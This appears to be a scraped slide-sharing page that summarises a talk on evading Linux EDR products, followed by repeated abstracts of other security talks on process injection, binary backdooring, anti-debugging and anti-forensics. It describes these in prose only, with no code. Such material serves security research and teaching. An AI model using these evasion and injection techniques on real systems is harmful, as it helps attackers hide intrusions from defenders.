Linux EDRs present challenges for adversaries seeking to evade detection. The document discusses several strategies and techniques for evading Linux EDRs, including:
1) Utilizing existing trusted system binaries as decoys to bypass process pattern matching. Techniques include using ld.so and busybox to launch payloads.
2) Developing "Uber preloaders" that can load modular payloads and provide command line arguments for evasion.
3) Storing payloads in volatile memory using techniques like memfd_create to avoid detection by EDRs scanning files on disk.
4) Coordinating payloads and preloaders through a "Zombie Ant Farm" module that stores
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013midnite_runr
Patching Windows Executives with the Backdoor Factory is a presentation about binary patching techniques. It discusses the history of patching, how key generators and Metasploit patch binaries, and how the author learned to manually patch binaries. The presentation then introduces the Backdoor Factory tool, which can automatically patch Windows binaries by injecting shellcode into code caves. It demonstrates patching via code cave insertion, single cave jumps, and cave jumping. Mitigations like self-validation and antivirus are discussed.
The goal of the workshop is to provide a hands-on introduction to key pen-testing tools and concepts that white-hat and black-hat hackers utilize to find and exploit vulnerabilities in real-world embedded devices.
As computer systems become more sophisticated, process injection techniques also evolve. These techniques are notorious for their use by "malicious software" to hide code execution and avoid detection. In this presentation we dive deep into the Windows runtime and we demonstrate these techniques. Besides, we also learn how to code construction and design patterns that relate to perform hidden code can recognize.
Captain Hook: Pirating AVs to Bypass Exploit MitigationsenSilo
In this talk we reveal six(!) different security issues that we uncovered in various hooking engines. The vulnerabilities we found enable a threat actor to bypass the security measures of the underlying operating system. As we uncovered the vulnerabilities one-by-one we found them to impact commercial engines, such as Microsoft’s Detours, open source engines such as EasyHook and proprietary engines such as those belonging to TrendMicro, Symantec, Kaspersky and about twenty others.
Source code recovery is one of the most tedious, and interesting, tasks in reverse engineering. During the course of this talk, the author will talk about a tool being developed (on and off) since last year that aims to generate auto-compilable source code from binaries. The tool is currently working though it needs a lot more work.
IDA Vulnerabilities and Bug Bounty by Masaaki ChidaCODE BLUE
IDA Pro is an advanced disassembler software and often used in vulnerability research and malware analysis. IDA Pro is used to analyse software behavior in detail, if there was a vulnerability and the user is attacked not only can it have impact in a social sense but also impact legal proceedings. In this presentation I will discuss the vulnerabilities found and attacks leveraging the vulnerabilities and Hex-rays's remediation process and dialogue I had with them.
http://codeblue.jp/en-speaker.html#MasaakiChida
Offensive cyber security: Smashing the stack with PythonMalachi Jones
: A necessary step in writing secure code is having an understanding of how vulnerable code can be exploited. This step is critical because unless you see the software from the vantage point of a hacker, what may look to be safe and harmless code, can have multiple vulnerabilities that result in systems running that software getting p0wned. The goal of this tech talk is to provide a step-by-step illustration of how not adhering to secure software design principles such as properly bounds checking buffers can open up computing devices to exploitation. Specifically, we will show that by using a very easy to use scripting language like python, we can do the following: 1) Smash the stack of a system running vulnerable code to gain arbitrary access. 2) Install a key logger that can phone home to a command and control server.
Steelcon 2014 - Process Injection with Pythoninfodox
This is the slides to accompany the talk given by Darren Martyn at the Steelcon security conference in July 2014 about process injection using python.
Covers using Python to manipulate processes by injecting code on x86, x86_64, and ARMv7l platforms, and writing a stager that automatically detects what platform it is running on and intelligently decides which shellcode to inject, and via which method.
The Proof of Concept code is available at https://github.com/infodox/steelcon-python-injection
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013midnite_runr
Patching Windows Executives with the Backdoor Factory is a presentation about binary patching techniques. It discusses the history of patching, how key generators and Metasploit patch binaries, and how the author learned to manually patch binaries. The presentation then introduces the Backdoor Factory tool, which can automatically patch Windows binaries by injecting shellcode into code caves. It demonstrates patching via code cave insertion, single cave jumps, and cave jumping. Mitigations like self-validation and antivirus are discussed.
The goal of the workshop is to provide a hands-on introduction to key pen-testing tools and concepts that white-hat and black-hat hackers utilize to find and exploit vulnerabilities in real-world embedded devices.
As computer systems become more sophisticated, process injection techniques also evolve. These techniques are notorious for their use by "malicious software" to hide code execution and avoid detection. In this presentation we dive deep into the Windows runtime and we demonstrate these techniques. Besides, we also learn how to code construction and design patterns that relate to perform hidden code can recognize.
Captain Hook: Pirating AVs to Bypass Exploit MitigationsenSilo
In this talk we reveal six(!) different security issues that we uncovered in various hooking engines. The vulnerabilities we found enable a threat actor to bypass the security measures of the underlying operating system. As we uncovered the vulnerabilities one-by-one we found them to impact commercial engines, such as Microsoft’s Detours, open source engines such as EasyHook and proprietary engines such as those belonging to TrendMicro, Symantec, Kaspersky and about twenty others.
Source code recovery is one of the most tedious, and interesting, tasks in reverse engineering. During the course of this talk, the author will talk about a tool being developed (on and off) since last year that aims to generate auto-compilable source code from binaries. The tool is currently working though it needs a lot more work.
IDA Vulnerabilities and Bug Bounty by Masaaki ChidaCODE BLUE
IDA Pro is an advanced disassembler software and often used in vulnerability research and malware analysis. IDA Pro is used to analyse software behavior in detail, if there was a vulnerability and the user is attacked not only can it have impact in a social sense but also impact legal proceedings. In this presentation I will discuss the vulnerabilities found and attacks leveraging the vulnerabilities and Hex-rays's remediation process and dialogue I had with them.
http://codeblue.jp/en-speaker.html#MasaakiChida
Offensive cyber security: Smashing the stack with PythonMalachi Jones
: A necessary step in writing secure code is having an understanding of how vulnerable code can be exploited. This step is critical because unless you see the software from the vantage point of a hacker, what may look to be safe and harmless code, can have multiple vulnerabilities that result in systems running that software getting p0wned. The goal of this tech talk is to provide a step-by-step illustration of how not adhering to secure software design principles such as properly bounds checking buffers can open up computing devices to exploitation. Specifically, we will show that by using a very easy to use scripting language like python, we can do the following: 1) Smash the stack of a system running vulnerable code to gain arbitrary access. 2) Install a key logger that can phone home to a command and control server.
Steelcon 2014 - Process Injection with Pythoninfodox
This is the slides to accompany the talk given by Darren Martyn at the Steelcon security conference in July 2014 about process injection using python.
Covers using Python to manipulate processes by injecting code on x86, x86_64, and ARMv7l platforms, and writing a stager that automatically detects what platform it is running on and intelligently decides which shellcode to inject, and via which method.
The Proof of Concept code is available at https://github.com/infodox/steelcon-python-injection
This document discusses various covert techniques used by malware to launch and conceal itself, including process injection, process replacement, and APC injection. Process injection techniques like DLL injection and direct injection allow malware to inject malicious code into running processes to hide its behavior and bypass security mechanisms. Process replacement involves overwriting the memory of a running process with malware code to disguise itself. APC injection uses asynchronous procedure calls to direct a thread to execute malicious code when it is in an alterable state.
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...CODE BLUE
Adobe Reader’s JavaScript APIs offer a rich set of functionality for document authors. These APIs allow for processing forms, controlling multimedia events, and communicating with databases, all of which provide end-users the ability to create complex documents. This complexity provides a perfect avenue for attackers to take advantage of weaknesses that exist in Reader’s JavaScript APIs.
In this talk, we will provide insight into both the documented and undocumented APIs available in Adobe Reader. Several code auditing techniques will be shared to aid in vulnerability discovery, along with numerous proofs-of-concept which highlight real-world examples. We’ll detail out how to chain several unique issues to obtain execution in a privileged context. Finally, we’ll describe how to construct an exploit that achieves remote code execution without the need for memory corruption.
The tool has been developed to be used inside a Linux environment. At the host system level, the only prerequisites are support for Python 2,7 or higher and the Android SDK.
Automated In-memory Malware/Rootkit Detection via Binary Analysis and Machin...Malachi Jones
Discussion and demonstration of an automated approach
for pairing Memory Forensics with Binary Analysis and
Machine Learning to analyze the execution behavior of
binaries collected from a set of hosts to detect advanced
persistent threats (APT)s that may evade detection by
hooking and "traditional" emulation.
One-Byte Modification for Breaking Memory Forensic AnalysisTakahiro Haruyama
The document proposes a one-byte modification method to potentially abort memory forensic analysis tools without impacting the running system or hiding specific objects. It identifies three sensitive operations in memory analysis: 1) virtual address translation in kernel space, 2) guessing the OS version and architecture, and 3) getting kernel objects like processes. For each operation, it outlines how top tools like Volatility and Memoryze perform the operation and identifies specific "abort factors", or one-byte values that could be modified to abort the analysis without direct detection. Modifying these factors could stop analysis tools from functioning properly without blue screening the system or hiding specific objects.
This document discusses various techniques used by covert malware to launch and conceal itself, including using launchers, process injection, process replacement, and hooks. It describes how malware uses these techniques to inject malicious code into running processes in order to gain privileges and evade detection. Process injection techniques like DLL injection and APC injection are commonly used to force the loading of malicious payloads.
Injection on Steroids: Codeless code injection and 0-day techniquesenSilo
This document discusses techniques for injecting code into processes without directly writing code to the target process's memory. It introduces a technique called "Trap Frame Injection" which hijacks the CPU's user mode state that is stored in trap frames during system calls. It also presents a "Codeless Code Injection" technique which builds ROP chains on the user stack and manipulates the stack pointer to trigger execution without direct code writes. Challenges with this approach like getting return values and avoiding deadlocks are also outlined along with solutions like using a device handle callback or creating a dedicated thread.
Practical Malware Analysis: Ch 10: Kernel Debugging with WinDbgSam Bowne
This document discusses using WinDbg for kernel debugging and analyzing rootkits. It explains that WinDbg can debug in both user-mode and kernel-mode, unlike OllyDbg which is only for user-mode. Device drivers run code in the Windows kernel and are difficult to analyze. The DriverEntry routine is called when a driver is loaded and it registers callback functions. Malware often imports functions from Ntoskrnl.exe and Hal.dll to manipulate the kernel. WinDbg commands like bp, lm, and dt are demonstrated for setting breakpoints, listing modules, and viewing structures. Symbol files from Microsoft provide function and structure names to make debugging easier.
The document discusses retooling offensive techniques in .NET for red teams. It proposes building modular code blocks and dynamic payloads that can be retooled on live systems to avoid detection. This involves leveraging existing system facilities and compiling code dynamically and in-memory using techniques like CodeDOM. The goals are to recon under the radar for longer, deliver payloads without being detected, and quickly retool for unknown systems. It explores options for live retooling like PowerShell, WMI, managed code, and COM/unmanaged code. The document also discusses building a managed execution toolkit called Typhoon CSaw that uses these techniques to achieve dynamic compilation, a REPL environment, removal of artifacts, and improved inter
Anti-debugging techniques can be used to detect the presence of a debugger. There are three main categories of anti-debugging techniques: API based detection, exception based detection, and direct structure access based detection. API based techniques use functions like IsDebuggerPresent() and CheckRemoteDebuggerPresent() to check debugger flags. Exception based techniques check for differences in exception handling when exceptions like INT3 are triggered. Direct structure access techniques directly check debugger flags in the Process Environment Block structure and heap for differences when being debugged. The document provides examples of specific techniques in each category to detect the presence of a debugger.
The document discusses various techniques for anti-debugging, which aims to hinder reverse engineering or debugging of software. It describes six major categories of anti-debugging techniques: API-based, exception-based, direct process/thread detection, modified code detection, hardware/register-based detection, and timing-based detection. The document provides code examples for API-based techniques including IsDebuggerPresent(), CheckRemoteDebuggerPresent(), OutputDebugString(), and FindWindow() calls. The goal is to educate developers on implementing anti-debugging in their software.
The document discusses exploiting vulnerabilities in Oracle Outside In, a file viewing component used by many forensic analysis tools. The author details fuzzing Oracle Outside In to find bugs, demonstrating attacks like process hangs and arbitrary code execution on tools like EnCase and X-Ways. Countermeasures are described like updating software, disabling bitmap heap spraying, and configuring tools to use native applications instead of Oracle Outside In.
Unpack your troubles*: .NET packer tricks and countermeasuresESET
This document discusses techniques used by .NET packers to obfuscate code and evade analysis. It covers how packers load encrypted next layers using Assembly.Load(), encrypt user strings and reference them using tokens, and hide and restore CIL code at JIT time. The author then provides solutions for analyzing packed samples, such as setting breakpoints on Assembly.Load() to detect next layers, and on JIT resolution APIs to catch decrypted code and strings. Sample Windbg scripts and a whitepaper are referenced for further technical details.
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
Some voices claim that "Angular is what HTML would have been if it had been designed for building web applications". While this statement may or may not be true, is certainly accounts as one of the bolder ones a JavaScript web framework can ever issue. And where boldness is glistening like a German Bratwurst sausage in the evening sun, a critical review from a grumpy old security person shouldn’t be too far away. This talk will have a stern, very stern look at AngularJS in particular and shed light on the security aspects of this ever-popular tool. Did the super-hero framework do everything right and follow its own super-heroic principles? Does AngularJS increase or rather decrease the attack surface of a web application? How does AngularJS play along with the Content Security Policy, and was it a good idea to combine this kind of security with futuristic feature creep? And what about AngularJS version 2.0? Beware that we won’t stop at glancing at the code itself, investigating security best practices, and verifying compatibility and other common things that contribute to robust security (or lack thereof). We will cross the moral border and see if the AngularJS team could notice rogue bug tickets. A pivotal question that everyone is wondering about is: Have they successfully kept evil minds like yours truly speaker here from introducing new security bugs into the code base? This talk is a reckoning with a modern JavaScript framework that promises a lot and keeps even more, not necessarily for the best for developers and users. We will conclude in deriving a general lesson learnt and hopefully agree that progress doesn't invariably mean an enhancement.
Fast and Generic Malware Triage Using openioc_scan Volatility PluginTakahiro Haruyama
This document describes a Volatility Framework plugin called openioc_scan that allows for fast and generic malware triage using open Indicators of Compromise (IOCs). The plugin supports OpenIOC 1.1 format files and can detect unknown threats based on generic malware traits like unusual executable paths, code injection, and hiding data in NTFS extended attributes. Some limitations include false positives and an inability to detect certain behaviors on 64-bit systems. Open source tools and generic IOCs are available for download to help analysts detect threats.
The document discusses generating volatile indicators of compromise (IOCs) from memory forensics to aid in fast malware triage. It analyzes common malware like ZeuS, SpyEye, PoisonIvy, and ZeroAccess to identify useful IOCs like code injection signs, imported functions, obfuscated strings, and protocol-related strings. Generated IOCs are defined using the OpenIOC framework. While effective, OpenIOC has limitations and room for improvement through automation, open sourcing, and integrating with other specifications.
Isolating the Ghost in the Machine: Unveiling Post Exploitation ThreatsrsacPriyanka Aash
During the past year IR teams and security researchers around the world witnessed a rise in the use of legitimate tools and common scripts in malware and APT attacks. This talk will explore the presenters’ research that focused on automating the analysis of PowerShell and Macro/VBA/VBS attacks by building a heuristic-based compiler engine that determines whether a script is malicious or not.
(Source: RSA Conference USA 2017)
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015CODE BLUE
The number of corporations establishing bug bounty programs in order to accomplish early discovery of vulnerabilities is increasing. So far, I have reported vulnerabilities in Firefox and received 45,000 USD (5,400,000 JPY) in bounties from the developer, which is the Mozilla Foundation. As a matter of fact, the vulnerabilities discovered in Firefox have a trend however, the awareness of the trend has not being raised among the Firefox developers and every time a new feature is implemented, a similar vulnerability is repeatedly created in the code. In this session, based on the vulnerabilities I have discovered in the past, I will introduce the patterns of vulnerabilities frequently observed in Firefox and delineate the root cause of those vulnerabilities. In addition, I will introduce my practical method that will allow you to effectively discover bugs in Firefox. This method is actually applicable not only to Firefox but any other open source software as it is based on an issue particular to open source software.
The document summarizes post-exploitation techniques on OSX and iPhone. It describes a technique called "userland-exec" that allows executing applications on OSX without using the kernel. This technique was adapted to work on jailbroken iPhones by injecting a non-signed library and hijacking the dynamic linker (dlopen) to map and link the library. With some additional patches, the authors were able to load an arbitrary non-signed library into the address space of a process on factory iPhones, representing the first reliable way to execute payloads on these devices despite code signing protections.
This document introduces EMBA, a free and open-source firmware analysis tool. It describes EMBA's extraction and analysis modules that can extract firmware components like Linux filesystems, decrypt images, and analyze the firmware using tools like binwalk and Yara rules. EMBA aims to automate common firmware analysis tasks and identify security issues like outdated components, weak configurations, and potential 0-day vulnerabilities through static and dynamic analysis techniques.
This document discusses various covert techniques used by malware to launch and conceal itself, including process injection, process replacement, and APC injection. Process injection techniques like DLL injection and direct injection allow malware to inject malicious code into running processes to hide its behavior and bypass security mechanisms. Process replacement involves overwriting the memory of a running process with malware code to disguise itself. APC injection uses asynchronous procedure calls to direct a thread to execute malicious code when it is in an alterable state.
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...CODE BLUE
Adobe Reader’s JavaScript APIs offer a rich set of functionality for document authors. These APIs allow for processing forms, controlling multimedia events, and communicating with databases, all of which provide end-users the ability to create complex documents. This complexity provides a perfect avenue for attackers to take advantage of weaknesses that exist in Reader’s JavaScript APIs.
In this talk, we will provide insight into both the documented and undocumented APIs available in Adobe Reader. Several code auditing techniques will be shared to aid in vulnerability discovery, along with numerous proofs-of-concept which highlight real-world examples. We’ll detail out how to chain several unique issues to obtain execution in a privileged context. Finally, we’ll describe how to construct an exploit that achieves remote code execution without the need for memory corruption.
The tool has been developed to be used inside a Linux environment. At the host system level, the only prerequisites are support for Python 2,7 or higher and the Android SDK.
Automated In-memory Malware/Rootkit Detection via Binary Analysis and Machin...Malachi Jones
Discussion and demonstration of an automated approach
for pairing Memory Forensics with Binary Analysis and
Machine Learning to analyze the execution behavior of
binaries collected from a set of hosts to detect advanced
persistent threats (APT)s that may evade detection by
hooking and "traditional" emulation.
One-Byte Modification for Breaking Memory Forensic AnalysisTakahiro Haruyama
The document proposes a one-byte modification method to potentially abort memory forensic analysis tools without impacting the running system or hiding specific objects. It identifies three sensitive operations in memory analysis: 1) virtual address translation in kernel space, 2) guessing the OS version and architecture, and 3) getting kernel objects like processes. For each operation, it outlines how top tools like Volatility and Memoryze perform the operation and identifies specific "abort factors", or one-byte values that could be modified to abort the analysis without direct detection. Modifying these factors could stop analysis tools from functioning properly without blue screening the system or hiding specific objects.
This document discusses various techniques used by covert malware to launch and conceal itself, including using launchers, process injection, process replacement, and hooks. It describes how malware uses these techniques to inject malicious code into running processes in order to gain privileges and evade detection. Process injection techniques like DLL injection and APC injection are commonly used to force the loading of malicious payloads.
Injection on Steroids: Codeless code injection and 0-day techniquesenSilo
This document discusses techniques for injecting code into processes without directly writing code to the target process's memory. It introduces a technique called "Trap Frame Injection" which hijacks the CPU's user mode state that is stored in trap frames during system calls. It also presents a "Codeless Code Injection" technique which builds ROP chains on the user stack and manipulates the stack pointer to trigger execution without direct code writes. Challenges with this approach like getting return values and avoiding deadlocks are also outlined along with solutions like using a device handle callback or creating a dedicated thread.
Practical Malware Analysis: Ch 10: Kernel Debugging with WinDbgSam Bowne
This document discusses using WinDbg for kernel debugging and analyzing rootkits. It explains that WinDbg can debug in both user-mode and kernel-mode, unlike OllyDbg which is only for user-mode. Device drivers run code in the Windows kernel and are difficult to analyze. The DriverEntry routine is called when a driver is loaded and it registers callback functions. Malware often imports functions from Ntoskrnl.exe and Hal.dll to manipulate the kernel. WinDbg commands like bp, lm, and dt are demonstrated for setting breakpoints, listing modules, and viewing structures. Symbol files from Microsoft provide function and structure names to make debugging easier.
The document discusses retooling offensive techniques in .NET for red teams. It proposes building modular code blocks and dynamic payloads that can be retooled on live systems to avoid detection. This involves leveraging existing system facilities and compiling code dynamically and in-memory using techniques like CodeDOM. The goals are to recon under the radar for longer, deliver payloads without being detected, and quickly retool for unknown systems. It explores options for live retooling like PowerShell, WMI, managed code, and COM/unmanaged code. The document also discusses building a managed execution toolkit called Typhoon CSaw that uses these techniques to achieve dynamic compilation, a REPL environment, removal of artifacts, and improved inter
Anti-debugging techniques can be used to detect the presence of a debugger. There are three main categories of anti-debugging techniques: API based detection, exception based detection, and direct structure access based detection. API based techniques use functions like IsDebuggerPresent() and CheckRemoteDebuggerPresent() to check debugger flags. Exception based techniques check for differences in exception handling when exceptions like INT3 are triggered. Direct structure access techniques directly check debugger flags in the Process Environment Block structure and heap for differences when being debugged. The document provides examples of specific techniques in each category to detect the presence of a debugger.
The document discusses various techniques for anti-debugging, which aims to hinder reverse engineering or debugging of software. It describes six major categories of anti-debugging techniques: API-based, exception-based, direct process/thread detection, modified code detection, hardware/register-based detection, and timing-based detection. The document provides code examples for API-based techniques including IsDebuggerPresent(), CheckRemoteDebuggerPresent(), OutputDebugString(), and FindWindow() calls. The goal is to educate developers on implementing anti-debugging in their software.
The document discusses exploiting vulnerabilities in Oracle Outside In, a file viewing component used by many forensic analysis tools. The author details fuzzing Oracle Outside In to find bugs, demonstrating attacks like process hangs and arbitrary code execution on tools like EnCase and X-Ways. Countermeasures are described like updating software, disabling bitmap heap spraying, and configuring tools to use native applications instead of Oracle Outside In.
Unpack your troubles*: .NET packer tricks and countermeasuresESET
This document discusses techniques used by .NET packers to obfuscate code and evade analysis. It covers how packers load encrypted next layers using Assembly.Load(), encrypt user strings and reference them using tokens, and hide and restore CIL code at JIT time. The author then provides solutions for analyzing packed samples, such as setting breakpoints on Assembly.Load() to detect next layers, and on JIT resolution APIs to catch decrypted code and strings. Sample Windbg scripts and a whitepaper are referenced for further technical details.
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
Some voices claim that "Angular is what HTML would have been if it had been designed for building web applications". While this statement may or may not be true, is certainly accounts as one of the bolder ones a JavaScript web framework can ever issue. And where boldness is glistening like a German Bratwurst sausage in the evening sun, a critical review from a grumpy old security person shouldn’t be too far away. This talk will have a stern, very stern look at AngularJS in particular and shed light on the security aspects of this ever-popular tool. Did the super-hero framework do everything right and follow its own super-heroic principles? Does AngularJS increase or rather decrease the attack surface of a web application? How does AngularJS play along with the Content Security Policy, and was it a good idea to combine this kind of security with futuristic feature creep? And what about AngularJS version 2.0? Beware that we won’t stop at glancing at the code itself, investigating security best practices, and verifying compatibility and other common things that contribute to robust security (or lack thereof). We will cross the moral border and see if the AngularJS team could notice rogue bug tickets. A pivotal question that everyone is wondering about is: Have they successfully kept evil minds like yours truly speaker here from introducing new security bugs into the code base? This talk is a reckoning with a modern JavaScript framework that promises a lot and keeps even more, not necessarily for the best for developers and users. We will conclude in deriving a general lesson learnt and hopefully agree that progress doesn't invariably mean an enhancement.
Fast and Generic Malware Triage Using openioc_scan Volatility PluginTakahiro Haruyama
This document describes a Volatility Framework plugin called openioc_scan that allows for fast and generic malware triage using open Indicators of Compromise (IOCs). The plugin supports OpenIOC 1.1 format files and can detect unknown threats based on generic malware traits like unusual executable paths, code injection, and hiding data in NTFS extended attributes. Some limitations include false positives and an inability to detect certain behaviors on 64-bit systems. Open source tools and generic IOCs are available for download to help analysts detect threats.
The document discusses generating volatile indicators of compromise (IOCs) from memory forensics to aid in fast malware triage. It analyzes common malware like ZeuS, SpyEye, PoisonIvy, and ZeroAccess to identify useful IOCs like code injection signs, imported functions, obfuscated strings, and protocol-related strings. Generated IOCs are defined using the OpenIOC framework. While effective, OpenIOC has limitations and room for improvement through automation, open sourcing, and integrating with other specifications.
Isolating the Ghost in the Machine: Unveiling Post Exploitation ThreatsrsacPriyanka Aash
During the past year IR teams and security researchers around the world witnessed a rise in the use of legitimate tools and common scripts in malware and APT attacks. This talk will explore the presenters’ research that focused on automating the analysis of PowerShell and Macro/VBA/VBS attacks by building a heuristic-based compiler engine that determines whether a script is malicious or not.
(Source: RSA Conference USA 2017)
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015CODE BLUE
The number of corporations establishing bug bounty programs in order to accomplish early discovery of vulnerabilities is increasing. So far, I have reported vulnerabilities in Firefox and received 45,000 USD (5,400,000 JPY) in bounties from the developer, which is the Mozilla Foundation. As a matter of fact, the vulnerabilities discovered in Firefox have a trend however, the awareness of the trend has not being raised among the Firefox developers and every time a new feature is implemented, a similar vulnerability is repeatedly created in the code. In this session, based on the vulnerabilities I have discovered in the past, I will introduce the patterns of vulnerabilities frequently observed in Firefox and delineate the root cause of those vulnerabilities. In addition, I will introduce my practical method that will allow you to effectively discover bugs in Firefox. This method is actually applicable not only to Firefox but any other open source software as it is based on an issue particular to open source software.
The document summarizes post-exploitation techniques on OSX and iPhone. It describes a technique called "userland-exec" that allows executing applications on OSX without using the kernel. This technique was adapted to work on jailbroken iPhones by injecting a non-signed library and hijacking the dynamic linker (dlopen) to map and link the library. With some additional patches, the authors were able to load an arbitrary non-signed library into the address space of a process on factory iPhones, representing the first reliable way to execute payloads on these devices despite code signing protections.
This document introduces EMBA, a free and open-source firmware analysis tool. It describes EMBA's extraction and analysis modules that can extract firmware components like Linux filesystems, decrypt images, and analyze the firmware using tools like binwalk and Yara rules. EMBA aims to automate common firmware analysis tasks and identify security issues like outdated components, weak configurations, and potential 0-day vulnerabilities through static and dynamic analysis techniques.
This document discusses techniques for exploiting DLL hijacking vulnerabilities remotely through user interaction. It argues that DLL hijacking is still a viable attack vector despite protections like DEP and ASLR. It proposes manipulating the current directory to execute exploits and hiding DLLs in archives, email attachments, and browser redressing to trigger exploits without appearing suspicious. While not suitable for mass attacks, it concludes DLL hijacking enables rapid targeted attacks by abusing existing vulnerabilities.
Esage on non-existent 0-days, stable binary exploits and user interactionDefconRussia
This document discusses techniques for exploiting DLL hijacking vulnerabilities remotely without user interaction. It outlines challenges with traditional fuzzing and static analysis approaches and argues that DLL hijacking remains a viable attack vector. Several methods are proposed for manipulating the current directory to execute an exploit DLL from a remote location, including browser UI redressing, macros, MHT files, archives, and multistage attacks. The document concludes DLL hijacking is well-suited for targeted attacks but not mass attacks due to reliance on user interaction and 0-days.
The document discusses developing an exploit from a vulnerability and integrating it into the Metasploit framework. It covers finding a buffer overflow vulnerability in an application called "Free MP3 CD Ripper", using tools like ImmunityDebugger and Mona.py to crash the application and gain control of EIP. It then shows using Mona.py to generate an exploit, testing it works, and submitting it to the Metasploit framework. It also provides an overview of Meterpreter and its capabilities.
A few slides on Robert Seacord's book, "Secure Coding in C/C++". While the McAfee template was used for the original presentation, the info from this presentation is public.
Piratng Avs to bypass exploit mitigationPriyanka Aash
"Put a low-level security researcher in front of hooking mechanisms and you get industry-wide vulnerability notifications, affecting security tools such as Anti-Virus, Anti-Exploitations and DLP, as well as non-security applications such as gaming and productivity tools. In this talk we reveal six(!) different security issues that we uncovered in various hooking engines. The vulnerabilities we found enable a threat actor to bypass the security measures of the underlying operating system. As we uncovered the vulnerabilities one-by-one we found them to impact commercial engines, such as Microsoft's Detours, open source engines such as EasyHook and proprietary engines such as those belonging to TrendMicro, Symantec, Kaspersky and about twenty others.
In this talk we'll survey the different vulnerabilities, and deep dive into a couple of those. In particular, we'll take a close look at a vulnerability appearing in the most popular commercial hooking engine of a large vendor. This vulnerability affects the most widespread productivity applications and forced the vendor to not only fix their engine, but also that their customers fix their applications prior to releasing the patch to the public. Finally, we'll demonstrate how security tools can be used as an intrusion channel for threat actors, ironically defeating security measures."
(Source: Black Hat USA 2016, Las Vegas)
Demystifying Binary Reverse Engineering - Pixels CampAndré Baptista
Reverse engineering is not just about uncovering the hidden behaviour of a given technology, system, program or device. It's actually an art and a mindset. Reversing is used by some government agencies, secret services, antivirus software companies, hackers and students. It can be used for many purposes: cracking/bypassing software, botnet analysis, finding 0day exploits, interpreting unknown protocols, understanding malware or finding bugs in apps.
DEFCON 25 presentation. An overview of the basis for needing memory integrity validation (secure hash) checks of a running VM. Edit memory through python scripting. Enhance timeline assurances that you have not missed events with multiple complementary event sources.
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNoSuchCon
This document discusses kernel exploitation techniques. It begins by explaining the KernelIo technique for reading and writing kernel memory on Windows and Linux despite protections like SMAP and SMEP. It then discusses several vulnerability cases that can enable KernelIo like out of bounds writes, kmalloc overflows, and abusing KASLR. Next, it analyzes design flaws in kernels like linked lists, hidden pointers, and callback mechanisms. It evaluates the state of exploitation on modern systems and envisions future hardened operating system designs. It advocates moving to C++ for exploitation development rather than shellcoding and introduces a C++ exploitation framework. The document was presented by Peter Hlavaty of the Keen Team and encourages recruitment for vulnerability research.
This document discusses techniques for analyzing obfuscated malicious web scripts. It begins by noting some limitations and objectives of the analysis. It then covers common obfuscation techniques used such as minification, visual noise, character encoding, and multiple layers of obfuscation. Methods for deobfuscation without wasting time are presented, such as using beautification tools and writing custom scripts. Specific tools are also highlighted that can aid in deobfuscation, like Didier Stevens tools and JavaScript analysis tools. Lastly, it discusses prevention best practices like keeping systems updated and avoiding unknown links/emails.
The Hacking Games - Operation System Vulnerabilities Meetup 29112022lior mazor
Our technology, work processes, and activities all are depend based on Operation Systems to be safe and secure. Join us virtually for our upcoming "The Hacking Games - Operation System Vulnerabilities" Meetup to learn how hacker can compromise Operation System, bypass AntiVirus protection layer and exploiting Linux eBPF.
This document provides an introduction to reverse engineering and discusses cracking Windows applications. It begins with a disclaimer that reverse engineering copyrighted material is illegal. It then defines reverse engineering as analyzing a system to understand its structure and function in order to modify or reimplement parts of it. The document discusses reasons for learning reverse engineering like malware analysis, bug fixing, and customizations. It outlines some of the history of reverse engineering in software development. The remainder of the document focuses on tools and techniques for reverse engineering like PE identification, decompilers, disassemblers, debuggers, patching applications in OllyDbg, and analyzing key generation and phishing techniques.
Dynamic Languages in Production: Progress and Open Challengesbcantrill
This document discusses dynamic languages in production and open challenges. It summarizes the history and rise of dynamic languages like Lisp, Java, and Node.js. It then describes tools developed at Joyent to debug Node.js applications in production environments, including mdb_v8 for post-mortem debugging using core dumps, and integrating Node.js with DTrace for live tracing and profiling. These tools allow inspecting runtime state, identifying memory leaks, and debugging non-reproducible issues.
Lyon Yang gave a presentation about exploiting IoT and embedded devices. He discussed how he became interested in embedded systems exploitation and contributed to the field. Yang explained common vulnerabilities he finds, such as stack overflows, backdoors, and exposed credentials. He demonstrated attacks like privilege escalation, command injection, and exploiting cache coherency issues. Yang provided tips for writing exploits against various architectures and overcoming challenges like bad characters and auto-restarting services.
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangLyon Yang
This is a light training/presentation talk.
My name is Lyon Yang and I am an IoT hacker. I live in sunny Singapore where IoT is rapidly being deployed – in production. This walkthrough will aim to shed light on the subject of IoT, from finding vulnerabilities in IoT devices to getting shiny hash prompts.
Our journey starts with a holistic view of IoT security, the issues faced by IoT devices and the common mistakes made by IoT developers. Things will then get technical as we progress into a both ARM and MIPS exploitation, followed by a ‘hack-along-with-us’ workshop where you will be exploiting a commonly found IoT daemon. If you are new to IoT or a seasoned professional you will likely learn something new in this workshop.
https://www.iotvillage.org/#schedule
ANALYZE'15 - Bulk Malware Analysis at ScaleJohn Bambenek
This document discusses extracting malware configurations at scale. It describes the large number of new malware samples seen daily and challenges with keeping up through traditional analysis methods. The author proposes automating extraction of configurations from remote access trojans (RATs) to more efficiently gather intelligence. Tools are introduced that can statically extract configurations from over 30 RAT types. A system is designed to intake large volumes of samples, use these tools to extract configurations, and output the data to a database for further analysis. The goal is to gain more insight into actors through common configuration elements like command and control domains even as they change tools.
Similar to DEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tips (20)
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryFelipe Prado
The document discusses strategies for red teaming Active Directory security. It begins with an overview of Active Directory components and how they can be exploited by attackers. It then covers offensive PowerShell techniques and how PowerShell security can be bypassed. The document also provides methods for effective Active Directory reconnaissance, including discovering administrator accounts and network assets without port scanning. Finally, it discusses some Active Directory defenses that can be deployed and potential bypass techniques.
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...Felipe Prado
